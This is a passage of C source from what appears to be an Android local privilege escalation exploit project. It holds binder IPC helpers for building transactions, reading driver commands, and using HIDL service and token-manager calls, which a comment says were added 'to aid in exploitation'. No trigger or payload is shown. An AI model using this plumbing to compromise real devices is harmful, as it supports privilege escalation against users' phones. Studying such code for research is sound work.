"off" 722 | * pointer is supplied, the function sets it to the object's offset index as well. 723 | */ 724 | void *bio_put_ptr(struct binder_io *bio, void *buffer, uint32_t size, uint32_t *off) 725 | { 726 | struct binder_buffer_object *obj; 727 | // uint32_t _off = (bio->data - bio->data0); 728 | 729 | 730 | /* Allocate the object size + the size of the data we want it to contain. */ 731 | obj = bio_alloc(bio, sizeof(*obj) + size); 732 | if (!obj) 733 | return NULL; 734 | 735 | if (obj && bio->offs_avail) { 736 | bio->offs_avail--; 737 | *bio->offs++ = ((char*) obj) - ((char*) bio->data0); 738 | } 739 | 740 | /* Compute the offset index. */ 741 | obj->hdr.type = BINDER_TYPE_PTR; 742 | obj->flags = 0; /* Plain, parent-less buffer: no BINDER_BUFFER_FLAG_HAS_PARENT. */ 743 | obj->buffer = 0; /* The buffer address will need a fixup; this is dealt with by bio_fixup_ptr(). */ 744 | obj->length = size; 745 | obj->parent = 0; 746 | obj->parent_offset = 0; 747 | 748 | /* Copy the data to the binder buffer.
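The payload lives immediately after the binder_buffer_object header, which is why the copy targets (obj + 1).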
*/ 749 | memcpy((obj + 1), buffer, size); 750 | 751 | if (off) 752 | *off = ((uint64_t)bio->offs - (uint64_t)bio->offs0) / sizeof(uint64_t) - 1; 753 | 754 | return NULL; 755 | } 756 | 757 | /* Fixup a ptr address of a BINDER_TYPE_PTR object given it's offset. */ 758 | void bio_fixup_ptr(struct binder_io *bio, void *base, uint32_t ptr_off) 759 | { 760 | struct binder_buffer_object *obj; 761 | 762 | //TODO: Check the offset. 763 | 764 | /* Check it's actually a BINDER_TYPE_PTR */ 765 | obj = (struct binder_buffer_object *)(bio->data0 + bio->offs0[ptr_off]); 766 | if (obj->hdr.type != BINDER_TYPE_PTR) { 767 | log_err("bio_fixup_ptr() -> Not a binder buffer object.\n"); 768 | exit(1); 769 | return; 770 | } 771 | 772 | uint64_t buffer_off = bio->offs0[ptr_off] + sizeof(*obj); 773 | 774 | obj->buffer = base + buffer_off; 775 | log_info("obj->buffer: %p\n", obj->buffer); 776 | } 777 | 778 | /* 779 | * Create a BINDER_TYPE_FDA object, and give in parameters the parent offset in 780 | * the transaction, as well as the number of file descriptors, and the offset within 781 | * the parent BINDER_TYPE_PTR object. 782 | */ 783 | void bio_put_fd_array(struct binder_io *bio, uint64_t parent, uint64_t parent_offset, int num_fds) 784 | { 785 | int i; 786 | struct binder_fd_array_object *fd_obj; 787 | 788 | /* Allocate the object containing the array. */ 789 | fd_obj = bio_alloc(bio, sizeof(*fd_obj)); 790 | if (!fd_obj) 791 | return; 792 | 793 | if (fd_obj && bio->offs_avail) { 794 | bio->offs_avail--; 795 | *bio->offs++ = ((char*) fd_obj) - ((char*) bio->data0); 796 | } 797 | 798 | fd_obj->hdr.type = BINDER_TYPE_FDA; 799 | fd_obj->num_fds = num_fds; 800 | fd_obj->parent = parent; 801 | fd_obj->parent_offset = parent_offset; 802 | } 803 | 804 | void bio_put_fd(struct binder_io *bio, int fd) 805 | { 806 | struct binder_fd_object *obj; 807 | 808 | obj = bio_alloc_obj(bio); 809 | if (!obj) 810 | return; 811 | 812 | obj->hdr.type = BINDER_TYPE_FD; 813 | obj->fd = fd; 814 | obj->cookie = 0; 815 | } 816 | 817 | void bio_put_ref(struct binder_io *bio, uint32_t handle) 818 | { 819 | struct flat_binder_object *obj; 820 | 821 | if (handle) 822 | obj = bio_alloc_obj(bio); 823 | else 824 | obj = bio_alloc(bio, sizeof(*obj)); 825 | 826 | if (!obj) 827 | return; 828 | 829 | obj->flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS; 830 | obj->hdr.type = BINDER_TYPE_HANDLE; 831 | obj->handle = handle; 832 | obj->cookie = 0; 833 | } 834 | 835 | 836 | 837 | 838 | void bio_put_string16(struct binder_io *bio, const uint16_t *str) 839 | { 840 | size_t len; 841 | uint16_t *ptr; 842 | 843 | if (!str) { 844 | bio_put_uint32(bio, 0xffffffff); 845 | return; 846 | } 847 | 848 | len = 0; 849 | while (str[len]) len++; 850 | 851 | if (len >= (MAX_BIO_SIZE / sizeof(uint16_t))) { 852 | bio_put_uint32(bio, 0xffffffff); 853 | return; 854 | } 855 | 856 | /* Note: The payload will carry 32bit size instead of size_t */ 857 | bio_put_uint32(bio, (uint32_t) len); 858 | len = (len + 1) * sizeof(uint16_t); 859 | ptr = bio_alloc(bio, len); 860 | if (ptr) 861 | memcpy(ptr, str, len); 862 | } 863 | 864 | void bio_put_string16_x(struct binder_io *bio, const char *_str) 865 | { 866 | unsigned char *str = (unsigned char*) _str; 867 | size_t len; 868 | uint16_t *ptr; 869 | 870 | if (!str) { 871 | bio_put_uint32(bio, 0xffffffff); 872 | return; 873 | } 874 | 875 | len = strlen(_str); 876 | 877 | if (len >= (MAX_BIO_SIZE / sizeof(uint16_t))) { 878 | bio_put_uint32(bio, 0xffffffff); 879 | return; 880 | } 881 | 882 | /* Note: The payload will carry 32bit size instead 
of size_t */ 883 | bio_put_uint32(bio, len); 884 | ptr = bio_alloc(bio, (len + 1) * sizeof(uint16_t)); 885 | if (!ptr) 886 | return; 887 | 888 | while (*str) 889 | *ptr++ = *str++; 890 | *ptr++ = 0; 891 | } 892 | 893 | static void *bio_get(struct binder_io *bio, size_t size) 894 | { 895 | size = (size + 3) & (~3); 896 | 897 | if (bio->data_avail < size){ 898 | bio->data_avail = 0; 899 | bio->flags |= BIO_F_OVERFLOW; 900 | return NULL; 901 | } else { 902 | void *ptr = bio->data; 903 | bio->data += size; 904 | bio->data_avail -= size; 905 | return ptr; 906 | } 907 | } 908 | 909 | uint32_t bio_get_uint32(struct binder_io *bio) 910 | { 911 | uint32_t *ptr = bio_get(bio, sizeof(*ptr)); 912 | return ptr ? *ptr : 0; 913 | } 914 | 915 | uint16_t *bio_get_string16(struct binder_io *bio, size_t *sz) 916 | { 917 | size_t len; 918 | 919 | /* Note: The payload will carry 32bit size instead of size_t */ 920 | len = (size_t) bio_get_uint32(bio); 921 | if (sz) 922 | *sz = len; 923 | return bio_get(bio, (len + 1) * sizeof(uint16_t)); 924 | } 925 | 926 | static struct flat_binder_object *_bio_get_obj(struct binder_io *bio) 927 | { 928 | size_t n; 929 | size_t off = bio->data - bio->data0; 930 | 931 | /* TODO: be smarter about this? */ 932 | for (n = 0; n < bio->offs_avail; n++) { 933 | if (bio->offs[n] == off) 934 | return bio_get(bio, sizeof(struct flat_binder_object)); 935 | } 936 | 937 | bio->data_avail = 0; 938 | bio->flags |= BIO_F_OVERFLOW; 939 | return NULL; 940 | } 941 | 942 | uint32_t bio_get_ref(struct binder_io *bio) 943 | { 944 | struct flat_binder_object *obj; 945 | 946 | obj = _bio_get_obj(bio); 947 | // log_info("[*] Ref object at %p\n", obj); 948 | 949 | if (!obj) 950 | return 0; 951 | 952 | if (obj->hdr.type == BINDER_TYPE_HANDLE) { 953 | return obj->handle; 954 | } 955 | 956 | /* I added that for my tests, but I shouldn't be needed on Android. */ 957 | if (obj->hdr.type == BINDER_TYPE_BINDER) { 958 | return obj->handle; 959 | } 960 | 961 | return 0; 962 | } 963 | 964 | /* This is custom code added to the binder API, to aid in exploitation. */ 965 | int binder_read(int fd, void *buffer, size_t size) 966 | { 967 | int res; 968 | struct binder_write_read bwr; 969 | 970 | bzero(&bwr, sizeof(bwr)); 971 | 972 | bwr.read_buffer = buffer; 973 | bwr.read_size = size; 974 | 975 | res = ioctl(fd, BINDER_WRITE_READ, &bwr); 976 | 977 | if (res < 0) { 978 | log_err("binder_read() -> %s\n", strerror(errno)); 979 | return res; 980 | } 981 | 982 | 983 | return bwr.read_consumed; 984 | } 985 | 986 | void *make_transaction(void *buffer, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 987 | { 988 | struct binder_transaction_data *tr; 989 | *(uint32_t *)buffer = BC_TRANSACTION; 990 | tr = (struct binder_transaction_data *)(buffer + sizeof(uint32_t)); 991 | 992 | tr->target.handle = handle; 993 | //tr->flags = TF_ONE_WAY; 994 | tr->flags = one_way ? TF_ONE_WAY : 0; 995 | /* We do accept FDS. */ 996 | tr->flags |= TF_ACCEPT_FDS; 997 | tr->data.ptr.buffer = opaque; 998 | tr->data_size = opaque_size; 999 | tr->data.ptr.offsets = offsets; 1000 | tr->offsets_size = offsets_size; 1001 | 1002 | 1003 | /* Return a pointer to the location for the next command. 
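 * (Because make_transaction() hands back the address just past the command it
 * wrote, several BC_ commands can be packed back-to-back into one buffer and
 * flushed with a single binder_write(). A rough sketch, with hypothetical
 * handles h1/h2 and payloads d1/d2:
 *
 *     void *next = make_transaction(buf, true, h1, d1, sz1, NULL, 0);
 *     make_transaction(next, true, h2, d2, sz2, NULL, 0);
 *     binder_write(bs, buf, 2 * (sizeof(uint32_t) + sizeof(struct binder_transaction_data)));
 * )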
*/ 1004 | return (void *)(tr + 1); 1005 | } 1006 | 1007 | void *make_reply(void *buffer, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 1008 | { 1009 | struct binder_transaction_data *tr; 1010 | *(uint32_t *)buffer = BC_REPLY; 1011 | tr = (struct binder_transaction_data *)(buffer + sizeof(uint32_t)); 1012 | 1013 | tr->target.handle = handle; 1014 | //tr->flags = TF_ONE_WAY; 1015 | tr->flags = one_way ? TF_ONE_WAY : 0; 1016 | tr->data.ptr.buffer = opaque; 1017 | tr->data_size = opaque_size; 1018 | tr->data.ptr.offsets = offsets; 1019 | tr->offsets_size = offsets_size; 1020 | 1021 | 1022 | /* Return a pointer to the location for the next command. */ 1023 | return (void *)(tr + 1); 1024 | } 1025 | 1026 | 1027 | int binder_transaction(struct binder_state *bs, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 1028 | { 1029 | struct binder_transaction_data *tr; 1030 | uint8_t buffer[sizeof(uint32_t) + sizeof(*tr)]; 1031 | uint32_t remaining = 0; 1032 | uint32_t consumed = 0; 1033 | 1034 | make_transaction(buffer, one_way, handle, opaque, opaque_size, offsets, offsets_size); 1035 | 1036 | /* Sending the transaction. */ 1037 | int res = binder_write(bs, buffer, sizeof(buffer)); 1038 | if (res < 0) 1039 | return res; 1040 | #if 0 1041 | uint32_t r[32]; 1042 | int r2; 1043 | r2 = binder_read(bs->fd, r, 32 * sizeof(uint32_t)); 1044 | /* TODO: Check results. */ 1045 | int i; 1046 | #endif 1047 | 1048 | 1049 | return res; 1050 | } 1051 | 1052 | int binder_reply(struct binder_state *bs, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 1053 | { 1054 | void *buffer; 1055 | struct binder_transaction_data *tr; 1056 | size_t size = sizeof(uint32_t) + sizeof(*tr); 1057 | 1058 | 1059 | buffer = malloc(size); 1060 | if (buffer == NULL) { 1061 | log_err("[-] binder_transaction. Failed to allocate memory.\n"); 1062 | return -1; 1063 | } 1064 | 1065 | bzero(buffer, size); 1066 | 1067 | 1068 | make_transaction(buffer, false, handle, opaque, opaque_size, offsets, offsets_size); 1069 | 1070 | *(uint32_t *)(buffer) = BC_REPLY; 1071 | 1072 | /* Sending the transaction. */ 1073 | int res = binder_write(bs, buffer, size); 1074 | /* TODO: Check result. */ 1075 | 1076 | uint32_t r[32]; 1077 | int r2; 1078 | r2 = binder_read(bs->fd, r, 32 * sizeof(uint32_t)); 1079 | /* TODO: Check results. */ 1080 | int i; 1081 | 1082 | free(buffer); 1083 | 1084 | return res; 1085 | } 1086 | 1087 | uint32_t binder_read_next(struct binder_state *bs, void *data, uint32_t *remaining, uint32_t *consumed) 1088 | { 1089 | int res; 1090 | uint32_t cmd; 1091 | void *ptr, *end; 1092 | 1093 | // log_info("remaining: %x\nconsumed: %x\n", *remaining, *consumed); 1094 | 1095 | if (!*remaining) { 1096 | /* Read the first 8 bytes. 
-- in practice up to 32 words (128 bytes) of commands. */
1097 |         // log_info("before read\n");
1098 |         res = binder_read(bs->fd, data, 32 * sizeof(uint32_t));
1099 |         // log_info("after read: %x\n", res);
1100 |         if (res < 0) {
1101 |             log_err("binder_read_next: %s\n", strerror(errno));
1102 |             return (uint32_t)-1;
1103 |         }
1104 | 
1105 |         *remaining = res;
1106 |         *consumed = 0;
1107 |     }
1108 | 
1109 | 
1110 |     ptr = data;
1111 |     ptr += *consumed;
1112 |     end = ptr + *remaining;
1113 | 
1114 |     cmd = *(uint32_t *)ptr;
1115 | 
1116 |     *consumed += sizeof(uint32_t);
1117 |     *remaining -= sizeof(uint32_t);
1118 |     ptr += sizeof(uint32_t);
1119 | 
1120 |     //log_info("cmd: %s\n", cmd_name(cmd));
1121 |     switch (cmd) {
1122 |     case BR_NOOP:
1123 |         res = 0;
1124 |         break;
1125 | 
1126 |     case BR_RELEASE:
1127 |     case BR_DECREFS:
1128 |     case BR_ACQUIRE:
1129 |     case BR_INCREFS:
1130 |         res = 2 * sizeof(uint64_t);
1131 |         *consumed += res;
1132 |         *remaining -= res;
1133 |         break;
1134 |     case BR_REPLY:
1135 |     case BR_TRANSACTION:
1136 |         res = sizeof(struct binder_transaction_data);
1137 |         *consumed += res;
1138 |         *remaining -= res;
1139 |         break;
1140 |     case BR_FAILED_REPLY:
1141 |     case BR_TRANSACTION_COMPLETE:
1142 |         res = 0;
1143 |         break;
1144 |     default:
1145 |         log_err("Unhandled command %s\n", cmd_name(cmd));
1146 |         exit(1);
1147 |         return (uint32_t)-1;
1148 | 
1149 |     }
1150 | 
1151 |     /* Return the command we just consumed. */
1152 |     return cmd;
1153 | }
1154 | 
1155 | uint32_t binder_read_next_dbg(struct binder_state *bs, void *data, uint32_t *remaining, uint32_t *consumed)
1156 | {
1157 |     int res;
1158 |     uint32_t cmd;
1159 |     void *ptr, *end;
1160 | 
1161 |     log_info("remaining: %x\nconsumed: %x\n", *remaining, *consumed);
1162 | 
1163 |     if (!*remaining) {
1164 |         /* Read the next batch of commands from the driver. */
1165 |         // log_info("before read\n");
1166 |         res = binder_read(bs->fd, data, 32 * sizeof(uint32_t));
1167 |         // log_info("after read: %x\n", res);
1168 |         if (res < 0) {
1169 |             log_err("binder_read_next: %s\n", strerror(errno));
1170 |             return (uint32_t)-1;
1171 |         }
1172 | 
1173 |         *remaining = res;
1174 |         *consumed = 0;
1175 |     }
1176 | 
1177 | 
1178 |     ptr = data;
1179 |     ptr += *consumed;
1180 |     end = ptr + *remaining;
1181 | 
1182 |     cmd = *(uint32_t *)ptr;
1183 | 
1184 |     *consumed += sizeof(uint32_t);
1185 |     *remaining -= sizeof(uint32_t);
1186 |     ptr += sizeof(uint32_t);
1187 | 
1188 |     log_info("cmd: %s\n", cmd_name(cmd));
1189 |     switch (cmd) {
1190 |     case BR_NOOP:
1191 |         res = 0;
1192 |         break;
1193 | 
1194 |     case BR_RELEASE:
1195 |     case BR_DECREFS:
1196 |     case BR_ACQUIRE:
1197 |     case BR_INCREFS:
1198 |         log_info("ptr: 0x%llx\n", *(uint64_t *)(ptr));
1199 |         log_info("cookie: 0x%llx\n", *(uint64_t *)(ptr + 0x8));
1200 |         res = 2 * sizeof(uint64_t);
1201 |         *consumed += res;
1202 |         *remaining -= res;
1203 |         break;
1204 |     case BR_REPLY:
1205 |     case BR_TRANSACTION:
1206 |         res = sizeof(struct binder_transaction_data);
1207 |         *consumed += res;
1208 |         *remaining -= res;
1209 |         break;
1210 |     case BR_FAILED_REPLY:
1211 |     case BR_TRANSACTION_COMPLETE:
1212 |         res = 0;
1213 |         break;
1214 |     default:
1215 |         log_err("Unhandled command %s\n", cmd_name(cmd));
1216 |         exit(1);
1217 |         return (uint32_t)-1;
1218 | 
1219 |     }
1220 | 
1221 |     /* Return the command we just consumed. */
1222 |     return cmd;
1223 | }
1224 | 
1225 | 
--------------------------------------------------------------------------------
/lpe/src/binder_lookup.c:
--------------------------------------------------------------------------------
1 | #include <stdlib.h>
2 | #include <string.h>
3 | #include <strings.h>
4 | #include <stdint.h>
5 | #include <stdbool.h>
6 | #include <sys/ioctl.h>
7 | 
8 | #include "binder.h"
9 | #include "binder_lookup.h"
10 | #include "log.h"
11 | 
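/*
 * The hidl_* types below mirror the HIDL wire format: a hidl_string or
 * hidl_vec travels as a 16-byte header (data pointer, 32-bit size, owns
 * flag) plus a second buffer holding the actual bytes. On the wire, each of
 * the two buffers becomes one BINDER_TYPE_PTR scatter-gather object, the
 * child one flagged with HAS_PARENT so the driver can patch the embedded
 * pointer. Roughly, for the name string sent by find_hwservice() below
 * (a sketch, not authoritative driver documentation):
 *
 *   offs[0] -> bbo[0]: PTR, buffer = &hidl_string header, length = 0x10
 *   offs[1] -> bbo[1]: PTR, buffer = string bytes, flags = 1 (HAS_PARENT),
 *                      parent = 0 (i.e. bbo[0]), parent_offset = 0
 */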
#define HWSERVICE_MANAGER "android.hidl.manager@1.0::IServiceManager" 13 | #define TOKEN_MANAGER "android.hidl.token@1.0::ITokenManager" 14 | 15 | 16 | typedef void * hidl_pointer; 17 | 18 | struct hidl_handle { 19 | hidl_pointer phandle; 20 | bool owns_handle; 21 | }; 22 | 23 | typedef struct hidl_string { 24 | hidl_pointer buffer; 25 | uint32_t size; 26 | bool owns_buffer; 27 | } hidl_string; 28 | 29 | typedef struct hidl_vec { 30 | hidl_pointer buffer; 31 | uint32_t size; 32 | bool owns_buffer; 33 | } hidl_vec; 34 | 35 | typedef struct service_list { 36 | struct service_list *next; 37 | const char *service_name; 38 | hidl_vec *token; 39 | } service_list_t; 40 | 41 | static service_list_t *services = NULL; 42 | 43 | 44 | bool add_service_token(const char *service, hidl_vec *token) 45 | { 46 | service_list_t *entry, *tmp; 47 | 48 | entry = calloc(1, sizeof(*entry)); 49 | if (!entry) 50 | return false; 51 | 52 | /* Insert. */ 53 | tmp = services; 54 | 55 | entry->service_name = strdup(service); 56 | entry->token = token; 57 | entry->next = tmp; 58 | 59 | if (!tmp) { 60 | services = entry; 61 | } else { 62 | entry->next = services; 63 | services = entry; 64 | } 65 | 66 | return true; 67 | } 68 | 69 | hidl_vec *get_service_token(const char *service) 70 | { 71 | service_list_t *entry = services; 72 | 73 | while (entry) { 74 | if (!strcmp(entry->service_name, service)) 75 | return entry->token; 76 | 77 | entry = entry->next; 78 | } 79 | 80 | return NULL; 81 | } 82 | 83 | /* Create wrapper for hidl_strings. */ 84 | hidl_string *hidl_string_new(const char *str) 85 | { 86 | size_t len; 87 | hidl_string *hstr = calloc(1, sizeof(*hstr)); 88 | if (!hstr) 89 | return NULL; 90 | 91 | len = strlen(str); 92 | 93 | hstr->buffer = (hidl_pointer)malloc(len + 1); 94 | if (!hstr->buffer) { 95 | free(hstr); 96 | return NULL; 97 | } 98 | 99 | strcpy(hstr->buffer, str); 100 | hstr->size = len; 101 | 102 | return hstr; 103 | } 104 | 105 | uint64_t find_hwservice(struct binder_state *bs, const char *service) 106 | { 107 | uint8_t txn_data[0x1000]; 108 | uint8_t reply_data[0x1000]; 109 | uint8_t *ptr = txn_data; 110 | uint64_t offsets[0x10]; 111 | uint64_t *offs = offsets; 112 | struct binder_write_read bwr; 113 | uint32_t buffers_size = 0; 114 | 115 | struct hidl_string *name; 116 | struct hidl_string *instance; 117 | uint64_t name_parent_off = 0; 118 | uint64_t instance_parent_off = 0; 119 | 120 | struct binder_buffer_object *bbo = NULL; 121 | 122 | struct { 123 | uint32_t cmd; 124 | struct binder_transaction_data txn; 125 | binder_size_t buffers_size; 126 | } __attribute__((packed)) writebuf; 127 | 128 | 129 | memset(txn_data, 0, 0x1000); 130 | bzero(&bwr, sizeof(bwr)); 131 | 132 | 133 | name = hidl_string_new(service); 134 | instance = hidl_string_new("default"); 135 | 136 | ptr = txn_data; 137 | 138 | /* Write the interface token first, as a classic C string, while taking 139 | * care of padding to 32bits. 140 | */ 141 | memcpy(ptr, HWSERVICE_MANAGER, sizeof(HWSERVICE_MANAGER) + 1); 142 | ptr += sizeof(HWSERVICE_MANAGER) + 1; 143 | 144 | /* Align on 32bits. */ 145 | while (((uint64_t)ptr) % sizeof(uint32_t)) 146 | ptr++; 147 | 148 | /* write the hidl_string. 
*/ 149 | bbo = (struct binder_buffer_object *)ptr; 150 | bbo[0].hdr.type = BINDER_TYPE_PTR; 151 | bbo[0].buffer = name; 152 | bbo[0].length = sizeof(struct hidl_string); 153 | bbo[0].flags = 0; 154 | bbo[0].parent = 0; 155 | bbo[0].parent_offset = 0; 156 | name_parent_off = (uint64_t)((uint8_t*)bbo - txn_data); 157 | buffers_size += bbo[0].length; 158 | *(offs++) = name_parent_off; 159 | 160 | ptr = &bbo[1]; 161 | 162 | /* Embed the pointer. */ 163 | bbo[1].hdr.type = BINDER_TYPE_PTR; 164 | bbo[1].buffer = name->buffer; 165 | bbo[1].length = name->size + 1; 166 | bbo[1].flags = 1; //HAS_PARENT; 167 | //bbo[1].parent = name_parent_off; 168 | bbo[1].parent = 0; 169 | bbo[1].parent_offset = 0; 170 | buffers_size += bbo[1].length; 171 | *(offs++) = (uint64_t)((uint8_t*)&bbo[1] - txn_data); 172 | 173 | ptr = &bbo[2]; 174 | 175 | bbo[2].hdr.type = BINDER_TYPE_PTR; 176 | bbo[2].buffer = instance; 177 | bbo[2].length = sizeof(struct hidl_string); 178 | bbo[2].flags = 0; 179 | instance_parent_off = (uint64_t)((uint8_t *)&bbo[2] - txn_data); 180 | *(offs++) = (uint64_t)((uint8_t*)&bbo[2] - txn_data); 181 | buffers_size += bbo[2].length; 182 | 183 | /* Embed the pointer. */ 184 | bbo[3].hdr.type = BINDER_TYPE_PTR; 185 | bbo[3].buffer = instance->buffer; 186 | bbo[3].length = instance->size + 1; 187 | bbo[3].flags = 1; //HAS_PARENT; 188 | //bbo[3].parent = instance_parent_off; 189 | bbo[3].parent = 2; 190 | bbo[3].parent_offset = 0; 191 | *(offs++) = (uint64_t)((uint8_t*)&bbo[3] - txn_data); 192 | buffers_size += bbo[3].length; 193 | 194 | ptr = &bbo[4]; 195 | 196 | /* Send the BINDER_TRANSACTION_SG. */ 197 | writebuf.cmd = BC_TRANSACTION_SG; 198 | writebuf.txn.target.handle = 0; 199 | writebuf.txn.code = 1; 200 | writebuf.txn.flags = 0; 201 | writebuf.txn.data_size = (uint64_t)ptr - (uint64_t)txn_data; 202 | writebuf.txn.offsets_size = (uint64_t)offs - (uint64_t)offsets; 203 | writebuf.txn.data.ptr.buffer = txn_data; 204 | writebuf.txn.data.ptr.offsets = offsets; 205 | 206 | /* Align buffers size. */ 207 | while (buffers_size % 8) 208 | buffers_size++; 209 | writebuf.buffers_size = buffers_size; 210 | 211 | bwr.write_size = sizeof(writebuf); 212 | bwr.write_consumed = 0; 213 | bwr.write_buffer = &writebuf; 214 | bwr.read_size = 0; 215 | bwr.read_consumed = 0; 216 | bwr.read_buffer = 0; 217 | 218 | /* Send query. */ 219 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 220 | uint32_t remaining, consumed; 221 | uint32_t rdata[32]; 222 | remaining = 0, consumed = 0; 223 | 224 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY); 225 | 226 | struct binder_transaction_data *tr = (struct binder_transaction *)((uint8_t*)rdata + consumed - sizeof(*tr)); 227 | 228 | struct flat_binder_object *fbo = (struct flat_binder_object *)(tr->data.ptr.buffer + 4); 229 | 230 | /* Acquire the ref. */ 231 | binder_acquire(bs, fbo->handle); 232 | 233 | /* Free the transaction. 
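 * (The + 4 on tr->data.ptr.buffer above skips what is presumably the leading
 * 32-bit status word of the HIDL reply; the flat_binder_object for the
 * service follows right after it.)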
*/ 234 | binder_free_buffer(bs, tr->data.ptr.buffer); 235 | 236 | return fbo->handle; 237 | } 238 | 239 | hidl_vec * create_token(struct binder_state *bs, uint64_t tm_handle, uint64_t my_handle) 240 | { 241 | uint8_t txn_data[0x1000]; 242 | uint8_t reply_data[0x1000]; 243 | uint8_t *ptr = txn_data; 244 | uint64_t offsets[0x10]; 245 | uint64_t *offs = offsets; 246 | struct binder_write_read bwr; 247 | uint32_t buffers_size = 0; 248 | 249 | struct hidl_string *name; 250 | struct hidl_string *instance; 251 | uint64_t name_parent_off = 0; 252 | uint64_t instance_parent_off = 0; 253 | 254 | struct binder_buffer_object *bbo = NULL; 255 | 256 | struct { 257 | uint32_t cmd; 258 | struct binder_transaction_data txn; 259 | binder_size_t buffers_size; 260 | } __attribute__((packed)) writebuf; 261 | 262 | 263 | memset(txn_data, 0, 0x1000); 264 | bzero(&bwr, sizeof(bwr)); 265 | 266 | 267 | ptr = txn_data; 268 | 269 | /* Write the interface token first, as a classic C string, while taking 270 | * care of padding to 32bits. 271 | */ 272 | memcpy(ptr, TOKEN_MANAGER, sizeof(TOKEN_MANAGER) + 1); 273 | ptr += sizeof(TOKEN_MANAGER) + 1; 274 | 275 | /* Align on 32bits. */ 276 | while (((uint64_t)ptr) % sizeof(uint32_t)) 277 | ptr++; 278 | 279 | /* Add our strong binder. */ 280 | struct flat_binder_object *fbo = (struct flat_binder_object *)ptr; 281 | fbo->hdr.type = BINDER_TYPE_BINDER; 282 | fbo->binder = my_handle; 283 | fbo->cookie = 0; 284 | *(offs++) = (uint64_t)fbo - (uint64_t)txn_data; 285 | 286 | ptr = &fbo[1]; 287 | 288 | /* Send the BINDER_TRANSACTION_SG. */ 289 | writebuf.cmd = BC_TRANSACTION_SG; 290 | writebuf.txn.target.handle = tm_handle; 291 | writebuf.txn.code = 1; //create_token 292 | writebuf.txn.flags = 0; 293 | writebuf.txn.data_size = (uint64_t)ptr - (uint64_t)txn_data; 294 | writebuf.txn.offsets_size = (uint64_t)offs - (uint64_t)offsets; 295 | writebuf.txn.data.ptr.buffer = txn_data; 296 | writebuf.txn.data.ptr.offsets = offsets; 297 | 298 | /* Align buffers size. */ 299 | while (buffers_size % 8) 300 | buffers_size++; 301 | writebuf.buffers_size = buffers_size; 302 | 303 | bwr.write_size = sizeof(writebuf); 304 | bwr.write_consumed = 0; 305 | bwr.write_buffer = &writebuf; 306 | bwr.read_size = 0; 307 | bwr.read_consumed = 0; 308 | bwr.read_buffer = 0; 309 | 310 | /* Send query. */ 311 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 312 | uint32_t remaining, consumed; 313 | uint32_t rdata[32]; 314 | remaining = 0, consumed = 0; 315 | 316 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY); 317 | 318 | struct binder_transaction_data *tr = (struct binder_transaction *)((uint8_t*)rdata + consumed - sizeof(*tr)); 319 | 320 | /* Okay, build the HIDL vec. */ 321 | bbo = (struct binder_buffer_object *)(tr->data.ptr.buffer + 4); 322 | hidl_vec *vec = calloc(1, sizeof(*vec)); 323 | 324 | //Should check for BINDER_TYPE_PTR 325 | 326 | memcpy(vec, bbo->buffer, sizeof(*vec)); 327 | 328 | /* Allocate the vec data. */ 329 | void *data = malloc(vec->size); 330 | memcpy(data, vec->buffer, vec->size); 331 | 332 | /* replace the pointers. */ 333 | vec->buffer = data; 334 | 335 | 336 | binder_free_buffer(bs, tr->data.ptr.buffer); 337 | 338 | /* return the token. 
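 * The token itself is just an opaque byte vector: any process that later
 * hands it back to ITokenManager -- transaction code 3, see get_by_token()
 * below -- receives a handle to the binder we registered here. This is how
 * the exploit processes pass binder handles around without registering a
 * named service.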
*/ 339 | return vec; 340 | } 341 | 342 | uint32_t get_by_token(struct binder_state *bs, uint64_t tm, hidl_vec *token) 343 | { 344 | uint8_t txn_data[0x1000]; 345 | uint8_t reply_data[0x1000]; 346 | uint8_t *ptr = txn_data; 347 | uint64_t offsets[0x10]; 348 | uint64_t *offs = offsets; 349 | struct binder_write_read bwr; 350 | uint32_t buffers_size = 0; 351 | 352 | struct hidl_string *name; 353 | struct hidl_string *instance; 354 | uint64_t name_parent_off = 0; 355 | uint64_t instance_parent_off = 0; 356 | 357 | struct binder_buffer_object *bbo = NULL; 358 | 359 | struct { 360 | uint32_t cmd; 361 | struct binder_transaction_data txn; 362 | binder_size_t buffers_size; 363 | } __attribute__((packed)) writebuf; 364 | 365 | 366 | memset(txn_data, 0, 0x1000); 367 | bzero(&bwr, sizeof(bwr)); 368 | 369 | 370 | ptr = txn_data; 371 | 372 | /* Write the interface token first, as a classic C string, while taking 373 | * care of padding to 32bits. 374 | */ 375 | memcpy(ptr, TOKEN_MANAGER, sizeof(TOKEN_MANAGER) + 1); 376 | ptr += sizeof(TOKEN_MANAGER) + 1; 377 | 378 | /* Align on 32bits. */ 379 | while (((uint64_t)ptr) % sizeof(uint32_t)) 380 | ptr++; 381 | 382 | 383 | /* write the hidl_vec. */ 384 | bbo = (struct binder_buffer_object *)ptr; 385 | bbo[0].hdr.type = BINDER_TYPE_PTR; 386 | bbo[0].buffer = token; 387 | bbo[0].length = sizeof(*token); 388 | bbo[0].flags = 0; 389 | bbo[0].parent = 0; 390 | bbo[0].parent_offset = 0; 391 | name_parent_off = (uint64_t)((uint8_t*)bbo - txn_data); 392 | buffers_size += bbo[0].length; 393 | *(offs++) = name_parent_off; 394 | 395 | ptr = &bbo[1]; 396 | 397 | /* Embed the pointer. */ 398 | bbo[1].hdr.type = BINDER_TYPE_PTR; 399 | bbo[1].buffer = token->buffer; 400 | bbo[1].length = token->size; 401 | bbo[1].flags = 1; //HAS_PARENT; 402 | //bbo[1].parent = name_parent_off; 403 | bbo[1].parent = 0; 404 | bbo[1].parent_offset = 0; 405 | buffers_size += bbo[1].length; 406 | *(offs++) = (uint64_t)((uint8_t*)&bbo[1] - txn_data); 407 | 408 | ptr = &bbo[2]; 409 | 410 | 411 | /* Send the BINDER_TRANSACTION_SG. */ 412 | writebuf.cmd = BC_TRANSACTION_SG; 413 | writebuf.txn.target.handle = tm; 414 | writebuf.txn.code = 3; //get_by_token 415 | writebuf.txn.flags = 0; 416 | writebuf.txn.data_size = (uint64_t)ptr - (uint64_t)txn_data; 417 | writebuf.txn.offsets_size = 